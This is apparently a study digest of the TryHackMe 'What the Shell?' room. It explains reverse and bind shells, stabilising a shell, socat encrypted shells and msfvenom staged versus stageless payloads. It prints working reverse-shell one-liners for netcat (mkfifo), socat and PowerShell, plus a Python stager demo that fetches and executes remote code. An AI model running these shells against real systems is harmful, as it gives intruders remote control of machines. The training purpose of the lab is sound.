What the Shell?

An introduction to sending and receiving (reverse/bind) shells when exploiting target machines.

This is a digest of the TryHackMe room "What the Shell?", which covers techniques for obtaining shells on target machines. It records the answers and summarizes each task so the techniques can be reviewed quickly.

Task 2: Tools

Useful tools for sending and receiving shells:

  • Netcat

  • Socat

  • Metasploit multi/handler: exploit/multi/handler is the module used to receive reverse shells (and the only listener that can serve staged payloads)

  • msfvenom

Task 3: Types of shell

  1. Reverse shells: the target is made to execute code that connects back to a listener on our machine. This works even when the target's firewall blocks inbound connections.

  2. Bind shells: the code executed on the target starts a listener attached to a shell on the target itself, and we connect to it. This needs an inbound port that is reachable and not filtered.

Shells can be either interactive or non-interactive. A non-interactive shell cannot run programs that prompt for input (ssh or sudo, for example), which is why the stabilization techniques in Task 5 matter.

Task 4: Netcat

Netcat is the most basic tool in a pentester's toolkit when it comes to any kind of networking.

  1. Reverse shell - listener on our own machine: nc -lvnp <port-number>

  2. Bind shell - connecting to the listener on the target: nc <target-ip> <chosen-port>

-lvnp means

  • -l is used to tell netcat that this will be a listener

  • -v is used to request a verbose output

  • -n tells netcat not to resolve hostnames through DNS (we are working with IP addresses anyway)

  • -p indicates that the port specification will follow.

Task 5: Netcat shell stabilization

There are many ways to stabilize netcat shells on Linux systems.

  • Technique 1: Python

    • To spawn a better-featured bash shell: python -c 'import pty;pty.spawn("/bin/bash")'

    • Some targets may need the Python version specified, e.g. python3 instead of python.

    • export TERM=xterm - this gives us access to terminal commands such as clear

    • Finally, background the shell with Ctrl+Z and, in our own terminal, run stty raw -echo; fg

      • raw stops our local terminal from interpreting keystrokes, so Ctrl+C, tab completion and arrow keys reach the remote shell; -echo turns off our own terminal's echo

      • fg brings the shell back to the foreground

    • If the shell dies, our own terminal is left in raw mode and stops showing what we type; running reset restores it

  • Technique 2: rlwrap

    • rlwrap adds readline features (command history, arrow keys) to the listener, which is particularly useful when dealing with Windows shells

    • Listener command: rlwrap nc -lvnp <port>

  • Technique 3: socat

    • Transfer a socat binary to the target and use it to open a fully interactive shell; this technique is limited to Linux targets
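Why Technique 1 works, as an added example (not code from the room): a plain netcat shell hands /bin/sh a socket as stdin and stdout, so the shell is not attached to a terminal, and pty.spawn puts it behind a pseudo-terminal instead. The first helper runs the same probe both ways and reports what the shell sees; the second shows what stty raw -echo changes in the line discipline, on a scratch pty pair so the real terminal is untouched. The probe string and the function names are this example's own; Unix only.

```python
"""What pty.spawn and stty raw -echo actually change.

Added example, not code from the TryHackMe room. Unix only.
"""
import os
import pty
import subprocess
import termios
import tty

# Constructed probe: the shell reports whether its stdin is a terminal.
PROBE = "if [ -t 0 ]; then echo has-tty; else echo no-tty; fi"


def shell_sees_tty(use_pty: bool) -> bool:
    """Run /bin/sh with stdin on a non-terminal (like a raw nc shell, where it
    is a socket) or behind a pty (like pty.spawn) and report what it sees."""
    if not use_pty:
        out = subprocess.run(["/bin/sh", "-c", PROBE],
                             stdin=subprocess.DEVNULL, capture_output=True).stdout
        return out.strip() == b"has-tty"
    pid, master_fd = pty.fork()          # child gets a new pty as controlling tty
    if pid == 0:
        os.execv("/bin/sh", ["/bin/sh", "-c", PROBE])
        os._exit(1)                      # only reached if execv failed
    chunks = []
    while True:
        try:
            data = os.read(master_fd, 1024)
        except OSError:                  # Linux reports EIO once the child side closes
            break
        if not data:
            break
        chunks.append(data)
    os.close(master_fd)
    os.waitpid(pid, 0)
    return b"has-tty" in b"".join(chunks)


LFLAG = 3   # index of c_lflag in the list returned by termios.tcgetattr


def raw_noecho_effect() -> dict:
    """What stty raw -echo does: tty.setraw clears ICANON (line buffering),
    ECHO (local echo) and ISIG (local Ctrl-C handling), so every keystroke is
    forwarded as-is to the remote pty instead of being handled locally.
    Returns {flag: (set before, set after)}."""
    master_fd, slave_fd = pty.openpty()
    try:
        before = termios.tcgetattr(slave_fd)
        tty.setraw(slave_fd)             # same effect as stty raw -echo
        after = termios.tcgetattr(slave_fd)
    finally:
        os.close(master_fd)
        os.close(slave_fd)
    flags = {"ECHO": termios.ECHO, "ICANON": termios.ICANON, "ISIG": termios.ISIG}
    return {name: (bool(before[LFLAG] & bit), bool(after[LFLAG] & bit))
            for name, bit in flags.items()}


if __name__ == "__main__":
    print("pipe  ->", shell_sees_tty(False))
    print("pty   ->", shell_sees_tty(True))
    print("stty raw -echo ->", raw_noecho_effect())
```

The second result is also why a dead shell leaves the terminal unusable: ECHO and ICANON stay cleared until something restores them, which is what reset does.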

Task 6: Socat

A very good article on socat: Read here

Reverse shell :

  • Basic listener syntax: socat TCP-L:<port> - (equivalent to nc -lvnp <port>)

  • Command to connect back

    • Windows: socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:powershell.exe,pipes

    • Linux: socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:"bash -li"

Bind shell:

  • Command to connect

    • Windows: socat TCP-L:<PORT> EXEC:powershell.exe,pipes

    • Linux: socat TCP-L:<PORT> EXEC:"bash -li"

    • Command on our attacking machine to connect to the waiting listener: socat TCP:<TARGET-IP>:<TARGET-PORT> -

    • A more stable, Linux-only listener: socat TCP-L:<port> FILE:`tty`,raw,echo=0. Despite its place in this list it is the attacker-side listener for a fully interactive reverse shell, not a bind shell: it attaches the incoming connection straight to our terminal, and the connecting side on the target must request a pseudo-terminal as well (socat's pty,stderr,sigint,setsid,sane options on the EXEC: address). socat has to be present on the target, so it is usually copied over first.

Task 7: socat encrypted shell

Getting an encrypted reverse shell:

  • First, generate a certificate: openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt

  • The command above creates a 2048-bit RSA key with a matching self-signed certificate, valid for 362 days (roughly a year); -nodes leaves the key unencrypted so socat can read it without a passphrase

  • Now, merge two created files into one: cat shell.key shell.crt > shell.pem

  • Reverse shell listener on attacker machine: socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 -

  • Execute command on victim machine: socat OPENSSL:<LOCAL-IP>:<LOCAL-PORT>,verify=0 EXEC:/bin/bash

Getting an encrypted bind shell:

  • Run on the target machine (Windows example; a Linux target uses EXEC:/bin/bash as in the reverse shell above): socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 EXEC:cmd.exe,pipes

  • Attacker machine: socat OPENSSL:<TARGET-IP>:<TARGET-PORT>,verify=0 -

Note: the certificate belongs to whichever side listens, so for a bind shell shell.pem has to be copied to the target first, Windows included. verify=0 disables certificate checking on both sides: this hides the traffic from a passive sniffer but does not protect against an active man-in-the-middle.

Task 8: Common shell payloads

Most current netcat builds are compiled without the -e option (executing a program on connect is considered too dangerous to ship), so nc -e /bin/sh no longer works and we have to wire the shell to the connection ourselves with a named pipe.

  • To create a bind shell:

    • On the target machine: mkfifo /tmp/f; nc -lvnp <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f

    • Attacker machine (connect to the target's listener): nc <TARGET-IP> <PORT>

  • For a reverse shell:

    • Attacker machine (listener, started first): nc -lvnp <PORT>

    • On the target machine: mkfifo /tmp/f; nc <LOCAL-IP> <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f

How it works: /tmp/f is a named pipe. Whatever netcat receives from the connection is piped into /bin/sh; the shell's stdout and stderr (2>&1) are written into /tmp/f, which netcat reads as its stdin and sends back over the connection. A detailed explanation of the command can be found here: Link

A standard one-liner PowerShell reverse shell is below; replace <ip> and <port> with the listener's address and port.

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Reverse shell cheat sheet list: Payloads All The Things

Task 9: msfvenom

The standard syntax for msfvenom: msfvenom -p <PAYLOAD> <OPTIONS>

There are two types of reverse shell payloads:

  1. Staged: the payload is sent in two parts

    1. Stager: a small piece of code delivered to the target that only connects back to the listener. It contains no shell code.

    2. Stage: the bulk of the reverse shell code, sent by the listener over the connection once the stager has connected. A plain netcat listener cannot send a stage, so staged payloads need Metasploit's multi/handler.

  2. Stageless: the entire reverse shell code is delivered to the target in one piece and connects back on its own, so any listener will do. Because the whole payload is present on the target, it is more likely to be caught by antivirus than a small stager.

In msfvenom payload names, a slash between the shell type and the connection type denotes a staged payload (windows/meterpreter/reverse_tcp) and an underscore a stageless one (windows/meterpreter_reverse_tcp).
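The staged/stageless split above, as an added example that is not msfvenom output and not code from the room: a "handler" (the multi/handler role) and a "stager" run on the loopback interface in one process. The wire format (a 4-byte big-endian length followed by the stage) and the function names are assumptions of this example, not Metasploit's protocol. The stage executes shell commands, so run it only on a machine you own.

```python
"""Staged vs stageless reverse shell payloads, in miniature.

Added example; not msfvenom output. The length-prefixed wire format is this
example's own convention, not Metasploit's.
"""
import socket
import struct
import subprocess
import threading

# The "stage": the bulk of the payload. It stays on the attacker's side and
# is only pushed over the wire once the stager has connected back.
STAGE = '''
import subprocess

def run(cmd):
    return subprocess.run(cmd, shell=True, capture_output=True).stdout.decode().strip()
'''


def stageless_payload(cmd: str) -> str:
    """Stageless: connection logic and shell code ship together, so the whole
    thing is present on the target from the start (and for AV to inspect)."""
    return subprocess.run(cmd, shell=True, capture_output=True).stdout.decode().strip()


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("stage truncated")
        buf += chunk
    return buf


def handler(listener: socket.socket, stage: str) -> None:
    """Handler: accept the stager and send it the stage. A plain nc listener
    cannot do this part, which is why staged payloads need multi/handler."""
    conn, _ = listener.accept()
    with conn:
        body = stage.encode()
        conn.sendall(struct.pack(">I", len(body)) + body)


def stager(host: str, port: int):
    """Stager: the only thing delivered to the target up front. It knows how
    to connect back and fetch the stage, nothing about running commands."""
    with socket.create_connection((host, port)) as s:
        (length,) = struct.unpack(">I", _recv_exact(s, 4))
        stage_src = _recv_exact(s, length).decode()
    namespace = {}
    exec(stage_src, namespace)        # stage runs from memory; nothing hits disk
    return namespace["run"]


def staged_demo(cmd: str) -> str:
    """Run the full staged exchange on loopback and execute one command."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))   # 0: let the OS pick a free port
    listener.listen(1)
    listener.settimeout(5.0)
    port = listener.getsockname()[1]
    t = threading.Thread(target=handler, args=(listener, STAGE))
    t.start()
    run = stager("127.0.0.1", port)   # "target" connects back and receives the stage
    t.join()
    listener.close()
    return run(cmd)


if __name__ == "__main__":
    print("staged   :", staged_demo("id"))
    print("stageless:", stageless_payload("id"))
```

Note what the stager contains: only connect, receive and exec. Everything that makes it a shell arrives over the established connection, which is why the listener has to be one that knows how to send it.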

A very good cheat sheet about msfvenom: Link here
